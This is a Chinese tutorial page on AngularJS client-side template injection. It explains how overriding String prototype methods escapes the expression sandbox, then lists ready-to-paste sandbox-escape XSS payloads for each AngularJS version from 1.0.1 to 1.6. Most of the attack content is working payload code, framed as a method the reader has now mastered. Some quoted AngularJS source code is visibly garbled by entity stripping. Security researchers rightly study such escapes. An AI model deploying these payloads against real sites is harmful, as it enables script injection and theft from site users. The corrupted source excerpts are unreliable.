如何使用AngularJs用户输入动态模板XSS攻击-js教程-PHP中文网

首页

web前端

js教程

如何使用AngularJs用户输入动态模板XSS攻击

php中世界最好的语言

Jun 02, 2018 pm 02:30 PM

angularjs javascript 使用

这次给大家带来如何使用AngularJs用户输入动态模板XSS攻击，使用AngularJs用户输入动态模板XSS攻击的注意事项有哪些，下面就是实战案例，一起来看一下。

概述

XSS攻击是Web攻击中最常见的攻击方法之一，它是通过对网页注入可执行代码且成功地被浏览器执行，达到攻击的目的，形成了一次有效XSS攻击，一旦攻击成功，它可以获取用户的联系人列表，然后向联系人发送虚假诈骗信息，可以删除用户的日志等等，有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼，它带来的危害是巨大的，是web安全的头号大敌。

前情提要

angularJs通过“{{}}”来作为输出的标志，而对于双括号里面的内容angularJs会计计算并输出结果，我们可以在里面输入JS代码，并且一些语句还能得到执行，这使得我们的XSS有了可能，虽然不能直接写函数表达式，但这并难不住我们的白帽。

沙箱检验

angularJs会对表达式进行重写，并过滤计算输出，比如我们输入

{{1 + 1}}

登录后复制

在JS中会被转换成

"use strict";
var fn = function(s, l, a, i) {
 return plus(1, 1);
};
return fn;

登录后复制

return fn;这里的返回会被angualrJs执行，angularJs改写这个方法后转换是这样的

"use strict";
var fn = function(s, l, a, i) {
 var v0, v1, v2, v3, v4 = l && ('constructor' in l),
 v5;
 if (!(v4)) {
 if (s) {
 v3 = s.constructor;
 }
 } else {
 v3 = l.constructor;
 }
 ensureSafeObject(v3, text);
 if (v3 != null) {
 v2 = ensureSafeObject(v3.constructor, text);
 } else {
 v2 = undefined;
 }
 if (v2 != null) {
 ensureSafeFunction(v2, text);
 v5 = 'alert\u00281\u0029';
 ensureSafeObject(v3, text);
 v1 = ensureSafeObject(v3.constructor(ensureSafeObject('alert\u00281\u0029', text)), text);
 } else {
 v1 = undefined;
 }
 if (v1 != null) {
 ensureSafeFunction(v1, text);
 v0 = ensureSafeObject(v1(), text);
 } else {
 v0 = undefined;
 }
 return v0;
};
return fn;

登录后复制

angularJs会检查每一个输入的参数，ensureSafeObject方法会检验出函数的构造方法，窗口对象，对象，或者对象的构造方法，任意的其中一项被检查出来，表达式都不会执行.angularJs还有ensureSafeMemeberName和ensureSafeFunction来过滤掉方法原型链方法和检查这个指向。

如何逃逸

怎么样能逃过模板的过滤呢，可以让我们输入的模板被角执行，因为angularJs不支持函数输入，我们不可以直接覆盖本地的JS函数。但在字符串对象中找到了漏洞，fromCharCode，则charCode， charAt，由于没有重写这些方法，通过改变本地的js函数，我可以在angularJs调用这些方法的时候为自己开一个后门，将我改写的来覆盖原来的函数。

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';

登录后复制

formCharCode方法执行的时候内部的this指向的是String对象，通过上面的可指执行语句，我们可以对fromCharCode 函数进行覆盖，当在本页面内执行时，比如：

onload=function(){
document.write(String.fromCharCode(97));//会弹出 /Backdoored/ 
}

登录后复制

还可以这样

'a'.constructor.prototype.charCodeAt=[].concat

登录后复制

当angularJs调用charCodeAt函数时，我的代码就被执行到angular源码去了，比如说在这段里面有encodeEntities 方法用来对属性和名称做一个过滤然后输出，

if (validAttrs[lkey] === true && (uriAttrs[lkey] !== true || uriValidator(value, isImage))) {
out(' ');
out(key);
out('="');
out(encodeEntities(value));//找的就是encodeEntities   
out('"');
}

登录后复制

具体的encodeEntities代码如下：

function encodeEntities(value) {
return value.
 replace(/&/g, '&').
 replace(SURROGATE_PAIR_REGEXP, function(value) {
 var hi = value.charCodeAt(0);
 var low = value.charCodeAt(1);
 return '' + (((hi - 0xD800) * 0x400) + (low - 0xDC00) + 0x10000) + ';';
 }).
 replace(NON_ALPHANUMERIC_REGEXP, function(value) {
 return '' + value.charCodeAt(0) + ';';//这里发生了不好事情，我改写了这个方法，可以植入一些恶意代码，并且得到返回输出  }).
replace(/</g, &#39;<&#39;).
replace(/>/g, '>');
}

登录后复制

具体执行

//这是输入代码 
{{
 'a'.constructor.prototype.charAt=[].join;
 $eval('x=""')+''
}}
//这是被覆盖影响的代码  
"use strict";
var fn = function(s, l, a, i) {
 var v5, v6 = l && ('x\u003d\u0022\u0022' in l);//被影响的
 if (!(v6)) {
  if (s) {
   v5 = s.x = "";//被影响的
  }
 } else {
  v5 = l.x = "";//被影响的
 }
 return v5;
};
fn.assign = function(s, v, l) {
 var v0, v1, v2, v3, v4 = l && ('x\u003d\u0022\u0022' in l);//被影响的
 v3 = v4 ? l : s;
 if (!(v4)) {
  if (s) {
   v2 = s.x = "";//被影响的
  }
 } else {
  v2 = l.x = "";//被影响的
 }
 if (v3 != null) {
  v1 = v;
  ensureSafeObject(v3.x = "", text);//被影响的
  v0 = v3.x = "" = v1;//被影响的
 }
 return v0;
};
return fn;

登录后复制

{{
 'a'.constructor.prototype.charAt=[].join;
 $eval('x=alert(1)')+'' //注入了alert(1) 
}}
"use strict";
var fn = function(s, l, a, i) {
 var v5, v6 = l && ('x\u003dalert\u00281\u0029' in l);
 if (!(v6)) {
  if (s) {
   v5 = s.x = alert(1);
  }
 } else {
  v5 = l.x = alert(1);
 }
 return v5;
};
fn.assign = function(s, v, l) {
 var v0, v1, v2, v3, v4 = l && ('x\u003dalert\u00281\u0029' in l);
 v3 = v4 ? l : s;
 if (!(v4)) {
  if (s) {
   v2 = s.x = alert(1);
  }
 } else {
  v2 = l.x = alert(1);
 }
 if (v3 != null) {
  v1 = v;
  ensureSafeObject(v3.x = alert(1), text);
  v0 = v3.x = alert(1) = v1;
 }
 return v0;
};
return fn;

登录后复制

下面附上一些代码，可以直接结合angularJs验证

不同版本的实现代码以及发现者：

1.0.1 - 1.1.5 Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

登录后复制

1.2.0 - 1.2.1 Jan Horn (Google)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

登录后复制

1.2.2 - 1.2.5 Gareth Heyes (PortSwigger)

{{'a'[{toString:[].join,length:1,0:'proto'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

登录后复制

1.2.6 - 1.2.18 Jan Horn (Google)

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.proto,$).value,0,'alert(1)')()}}

登录后复制

1.2.19 - 1.2.23 Mathias Karlsson

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

登录后复制

1.2.24 - 1.2.29 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

登录后复制

1.3.0 Gábor Molnár (Google)

{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}

登录后复制

1.3.1 - 1.3.2 Gareth Heyes (PortSwigger)

{{
{}[{toString:[].join,length:1,0:'proto'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf; 
$eval('x=alert(1)//'); 
}}

登录后复制

1.3.3 - 1.3.18 Gareth Heyes (PortSwigger)

{{{}[{toString:[].join,length:1,0:'proto'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}

登录后复制

1.3.19 Gareth Heyes (PortSwigger)

{{
'a'[{toString:false,valueOf:[].join,length:1,0:'proto'}].charAt=[].join; 
$eval('x=alert(1)//'); 
}}

登录后复制

1.3.20 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

登录后复制

1.4.0 - 1.4.9 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

登录后复制

1.5.0 - 1.5.8 Ian Hickey

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

登录后复制

1.5.9 - 1.5.11 Jan Horn (Google)

{{
 c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
 c.$apply=$apply;c.$eval=b;op=$root.$$phase;
 $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
 C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
 B=C(b,c,b);$evalAsync("
 astNode=pop();astNode.type='UnaryExpression';
 astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
 astNode.argument={type:'Identifier',name:'foo'};
 ");
 m1=B($$asyncQueue.pop().expression,null,$root);
 m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
 $eval('a(b.c)');[].push.apply=a;
}}

登录后复制

= 1.6.0 Mario Heiderich（Cure53）

{{constructor.constructor('alert(1)')()}}

登录后复制

相信看了本文案例你已经掌握了方法，更多精彩请关注php中文网其它相关文章！

热AI工具

热工具

热门话题

gmail邮箱登陆入口在哪里

7319

Java教程

1625

CakePHP 教程

1349

Laravel 教程

1261

PHP教程

1209

显示更多

Related knowledge

如何使用磁力链接 Feb 18, 2024 am 10:02 AM

磁力链接是一种用于下载资源的链接方式，相比传统的下载方式更为便捷和高效。使用磁力链接可以通过点对点的方式下载资源，而不需要依赖中介服务器。本文将介绍磁力链接的使用方法及注意事项。一、什么是磁力链接磁力链接是一种基于P2P（Peer-to-Peer）协议的下载方式。通过磁力链接，用户可以直接连接到资源的发布者，从而完成资源的共享和下载。与传统的下载方式相比，磁

如何使用mdf和mds文件 Feb 19, 2024 pm 05:36 PM

mdf文件和mds文件怎么用随着计算机技术的不断进步，我们可以通过多种方式来存储和共享数据。在数字媒体领域，我们经常会遇到一些特殊的文件格式。在这篇文章中，我们将讨论一种常见的文件格式——mdf和mds文件，并介绍它们的使用方法。首先，我们需要了解mdf文件和mds文件的含义。mdf是CD/DVD镜像文件的扩展名，而mds文件则是mdf文件的元数据文件。

crystaldiskmark是什么软件？-crystaldiskmark如何使用？ Mar 18, 2024 pm 02:58 PM

CrystalDiskMark是一款适用于硬盘的小型HDD基准测试工具，可以快速测量顺序和随机读/写速度。接下来就让小编为大家介绍一下CrystalDiskMark，以及crystaldiskmark如何使用吧~一、CrystalDiskMark介绍CrystalDiskMark是一款广泛使用的磁盘性能测试工具，用于评估机械硬盘和固态硬盘（SSD）的读写速度和随机I/O性能。它是一款免费的Windows应用程序，并提供用户友好的界面和各种测试模式来评估硬盘驱动器性能的不同方面，并被广泛用于硬件评

foobar2000怎么下载？-foobar2000怎么使用 Mar 18, 2024 am 10:58 AM

foobar2000是一款能随时收听音乐资源的软件，各种音乐无损音质带给你，增强版本的音乐播放器，让你得到更全更舒适的音乐体验，它的设计理念是将电脑端的高级音频播放器移植到手机上，提供更加便捷高效的音乐播放体验，界面设计简洁明了易于使用它采用了极简的设计风格，没有过多的装饰和繁琐的操作能够快速上手，同时还支持多种皮肤和主题，根据自己的喜好进行个性化设置，打造专属的音乐播放器支持多种音频格式的播放，它还支持音频增益功能根据自己的听力情况调整音量大小，避免过大的音量对听力造成损害。接下来就让小编为大

网易邮箱大师怎么用 Mar 27, 2024 pm 05:32 PM

网易邮箱，作为中国网民广泛使用的一种电子邮箱，一直以来以其稳定、高效的服务赢得了用户的信赖。而网易邮箱大师，则是专为手机用户打造的邮箱软件，它极大地简化了邮件的收发流程，让我们的邮件处理变得更加便捷。那么网易邮箱大师该如何使用，具体又有哪些功能呢，下文中本站小编将为大家带来详细的内容介绍，希望能帮助到大家！首先，您可以在手机应用商店搜索并下载网易邮箱大师应用。在应用宝或百度手机助手中搜索“网易邮箱大师”，然后按照提示进行安装即可。下载安装完成后，我们打开网易邮箱账号并进行登录，登录界面如下图所示

百度网盘app怎么用 Mar 27, 2024 pm 06:46 PM

在如今云存储已经成为我们日常生活和工作中不可或缺的一部分。百度网盘作为国内领先的云存储服务之一，凭借其强大的存储功能、高效的传输速度以及便捷的操作体验，赢得了广大用户的青睐。而且无论你是想要备份重要文件、分享资料，还是在线观看视频、听取音乐，百度网盘都能满足你的需求。但是很多用户们可能对百度网盘app的具体使用方法还不了解，那么这篇教程就将为大家详细介绍百度网盘app如何使用，还有疑惑的用户们就快来跟着本文详细了解一下吧！百度云网盘怎么用：一、安装首先，下载并安装百度云软件时，请选择自定义安装选

小爱音箱怎么使用小爱音箱怎么连接手机 Feb 22, 2024 pm 05:19 PM

长按音箱的播放键后，在软件中连接wifi即可使用。教程适用型号：小米12系统：EMUI11.0版本：小爱同学2.4.21解析1首先找到音箱的播放键，长按进入配网模式。2在手机上的小爱音箱软件中登录小米账号，点击添加新的小爱音箱。3输入wifi的名称和密码后，即可呼唤小爱同学进行使用了。补充：小爱音箱有什么功能1小爱音箱有系统功能、社交功能、娱乐功能、知识功能、生活功能、智能家庭、训练计划。总结/注意事项手机要提前安装好小爱同学APP，方便连接和使用。

pip镜像源简易指南：轻松掌握使用方法 Jan 16, 2024 am 10:18 AM

轻松上手：如何使用pip镜像源随着Python在全球范围内的普及，pip成为了Python包管理的标准工具。然而，许多开发者在使用pip安装包时面临的一个常见问题是速度慢。这是因为默认情况下，pip从Python官方源或其他外部源下载包，而这些源可能位于海外服务器，导致下载速度缓慢。为了提高下载速度，我们可以使用pip镜像源。什么是pip镜像源？简单来说，就

See all articles

如何使用AngularJs用户输入动态模板XSS攻击

热AI工具

Undresser.AI Undress

AI Clothes Remover

Undress AI Tool

Clothoff.io

AI Hentai Generator

热门文章

热工具

记事本++7.3.1

SublimeText3汉化版

禅工作室 13.0.1

Dreamweaver CS6

SublimeText3 Mac版

热门话题